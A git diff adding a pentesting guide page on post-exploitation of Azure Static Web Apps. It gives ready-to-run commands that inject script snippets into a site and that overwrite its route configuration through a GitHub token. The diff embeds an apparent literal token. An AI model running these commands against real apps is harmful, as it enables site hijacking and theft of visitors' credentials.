MIGRATION TYPOS

2026-01-15 14:23:16 -08:00 · 2025-01-05 21:15:12 +01:00
parent c1aee098b6
commit 3a7480d764
20 changed files with 166 additions and 36 deletions
--- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-static-web-apps-post-exploitation.md
+++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-static-web-apps-post-exploitation.md
@@ -0,0 +1,71 @@
+# Az - Static Web Apps Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Azure Static Web Apps
+
+For more information about this service check:
+
+{{#ref}}
+../az-services/az-static-web-apps.md
+{{#endref}}
+
+### Microsoft.Web/staticSites/snippets/write
+
+It's possible to make a static web page load arbitary HTML code by creating a snippet. This could allow an attacker to inject JS code inside the web app and steal sensitive information such as credentials or mnemonic keys (in web3 wallets).
+
+The fllowing command create an snippet that will always be loaded by the web app::
+
+```bash
+az rest \
+    --method PUT \
+    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/snippets/<snippet-name>?api-version=2022-03-01" \
+    --headers "Content-Type=application/json" \
+    --body '{
+        "properties": {
+            "name": "supersnippet",
+            "location": "Body",
+            "applicableEnvironmentsMode": "AllEnvironments",
+            "content": "PHNjcmlwdD4KYWxlcnQoIkF6dXJlIFNuaXBwZXQiKQo8L3NjcmlwdD4K",
+            "environments": [],
+            "insertBottom": false
+        }
+    }'
+```
+
+### Overwrite file - Overwrite routes, HTML, JS...
+
+It's possible to **overwritte a fie inside the Github repo** containing the app through Azure having the **Github token** sending a request such as the following which will indicate the path of the file to overwrite, the content of the file and the commit message.
+
+This can be abused by attackers to basically **change the content of the web app** to serve malicious content (steal credentials, mnemonic keys...) or just to **re-route certain paths** to their own servers by oevrwritting the `staticwebapp.config.json` file.
+
+> [!WARNING]
+> Note that if an attacker manages to compromise the Github repo in any way, they can also overwrite the file directly from Github.
+
+```bash
+curl -X PUT "https://functions.azure.com/api/github/updateGitHubContent" \
+-H "Content-Type: application/json" \
+-d '{
+    "commit": {
+        "message": "Update static web app route configuration",
+        "branchName": "main",
+        "committer": {
+            "name": "Azure App Service",
+            "email": "donotreply@microsoft.com"
+        },
+        "contentBase64Encoded": "ewogICJuYXZpZ2F0aW9uRmFsbGJhY2siOiB7CiAgICAicmV3cml0ZSI6ICIvaW5kZXguaHRtbCIKICB9LAogICJyb3V0ZXMiOiBbCiAgICB7CiAgICAgICJyb3V0ZSI6ICIvcHJvZmlsZSIsCiAgICAgICJtZXRob2RzIjogWwogICAgICAgICJnZXQiLAogICAgICAgICJoZWFkIiwKICAgICAgICAicG9zdCIKICAgICAgXSwKICAgICAgInJld3JpdGUiOiAiL3AxIiwKICAgICAgInJlZGlyZWN0IjogIi9sYWxhbGEyIiwKICAgICAgInN0YXR1c0NvZGUiOiAzMDEsCiAgICAgICJhbGxvd2VkUm9sZXMiOiBbCiAgICAgICAgImFub255bW91cyIKICAgICAgXQogICAgfQogIF0KfQ==",
+        "filePath": "staticwebapp.config.json",
+        "message": "Update static web app route configuration",
+        "repoName": "carlospolop/my-first-static-web-app",
+        "sha": "4b6165d0ad993a5c705e8e9bb23b778dff2f9ca4"
+    },
+    "gitHubToken": "gho_1OSsm834ai863yKkdwHGj31927PCFk44BAXL"
+}'
+```
+
+
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+
+